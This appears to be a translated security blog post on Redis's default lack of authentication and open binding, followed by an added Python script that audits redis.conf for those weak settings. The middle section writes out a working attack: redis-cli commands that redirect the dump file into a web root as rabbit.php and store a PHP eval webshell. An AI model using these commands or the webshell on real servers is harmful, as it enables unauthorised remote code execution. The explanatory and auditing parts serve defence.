Redis For Webshell
2019-08-14
RabbitMask
Security (unauthorized access)
As already mentioned in "Redis 初步" (Redis Basics), Redis does not set a password by default. Let's go through the default conf file to examine its out-of-the-box security.
First, the password: none is set by default, and one has to be specified manually with requirepass password. If you use a custom conf file but do not pass that file to the redis-server command at startup, the setting likewise does not take effect.
# Require clients to issue AUTH <PASSWORD> before processing any other
# commands. This might be useful in environments in which you do not trust
# others with access to the host running redis-server.
#
# This should stay commented out for backward compatibility and because most
# people do not need auth (e.g. they run their own servers).
#
# Warning: since Redis is pretty fast an outside user can try up to
# 150k passwords per second against a good box. This means that you should
# use a very strong password otherwise it will be very easy to break.
#
# requirepass foobared
Second, the access policy: by default it is completely open, listening on 0.0.0.0.
# By default Redis listens for connections from all the network interfaces
# available on the server. It is possible to listen to just one or multiple
# interfaces using the "bind" configuration directive, followed by one or
# more IP addresses.
#
# Examples:
#
# bind 192.168.1.100 10.0.0.1
# bind 127.0.0.1
These two points are the root cause of the widely circulated Redis unauthorized-access vulnerability. Does it count as a vulnerability? I suppose so, and yet everything about it is perfectly reasonable.
Write permission (Get Webshell)
Continuing through the config file, dbfilename is the name of the dump file. By default this is of course an rdb file, i.e. the storage file generated by the save operation.
# The filename where to dump the DB
dbfilename dump.rdb
dir is the "working directory", i.e. the location where the storage file mentioned above is saved. It defaults to the Redis root directory; setting it to a custom absolute path is of course entirely possible.
# The working directory.
#
# The DB will be written inside this directory, with the filename specified
# above using the 'dbfilename' configuration directive.
#
# The Append Only File will also be created inside this directory.
#
# Note that you must specify a directory here, not a file name.
dir ./
Finally, Redis has one more mechanism: the parameters above can be set from the console with the config command. This does not modify the conf file and only applies to the running instance (it is lost when Redis restarts), but! It is precisely this mechanism that lets a config set take effect without restarting Redis. Enough talk, let's begin~
#redis-cli
192.168.1.254:6379> config set dir D:\Software\Phpstudy\PHPTutorial\WWW\DVWA
OK
192.168.1.254:6379> config set dbfilename rabbit.php
OK
192.168.1.254:6379> set webshell "<?php eval(@$_POST['a']);?>"
OK
192.168.1.254:6379> save
OK
#redis-server
[20424] 14 Aug 14:21:54.207 * DB saved on disk
The file is successfully generated in the specified directory:
It parses normally, getshell success:
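As an added example (not part of the original post), the following Python script audits a redis.conf for the defaults discussed in both sections above (requirepass, bind, dir, dbfilename); it also checks protected-mode and rename-command, two real Redis hardening directives the post does not mention. The sample config strings are constructed.

```python
"""Audit a redis.conf for the weak defaults the post walks through.

Added example, not from the original post. Besides the directives the
post discusses (requirepass, bind, dir, dbfilename) it checks two real
Redis hardening directives, protected-mode and rename-command."""
from typing import Dict, List


def parse_conf(text: str) -> Dict[str, List[List[str]]]:
    """Map directive -> list of argument lists. Comment and blank lines are
    skipped, so a commented-out '# requirepass foobared' counts as unset."""
    conf: Dict[str, List[List[str]]] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit(text: str) -> List[str]:
    """Return findings; an empty list means every check passed."""
    conf = parse_conf(text)
    findings = []
    if "requirepass" not in conf:
        findings.append("no requirepass: unauthenticated CONFIG SET and SAVE")
    binds = [a for args in conf.get("bind", []) for a in args]
    if not binds or "0.0.0.0" in binds:
        findings.append("bind missing or 0.0.0.0: listening on all interfaces")
    mode = conf.get("protected-mode", [["yes"]])[0]
    if mode and mode[0].lower() == "no":
        findings.append("protected-mode no: loopback-only fallback disabled")
    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    if "CONFIG" not in renamed:
        findings.append("CONFIG not renamed: dir/dbfilename changeable at runtime")
    for args in conf.get("dbfilename", []):
        if args and not args[0].endswith(".rdb"):
            findings.append(f"dbfilename {args[0]}: dump is not an .rdb file")
    return findings


# Constructed sample: the stock defaults quoted in the post.
DEFAULT_CONF = "# requirepass foobared\n# bind 127.0.0.1\ndbfilename dump.rdb\ndir ./\n"

# Constructed sample: a hardened file (the requirepass value is a placeholder).
HARDENED_CONF = ("requirepass PLACEHOLDER-LONG-RANDOM-SECRET\nbind 127.0.0.1\n"
                 "protected-mode yes\nrename-command CONFIG \"\"\n"
                 "dbfilename dump.rdb\ndir /var/lib/redis\n")
```

Run `audit(DEFAULT_CONF)` to see the three findings that together make the scenario in this post possible, and `audit(HARDENED_CONF)` for an empty list.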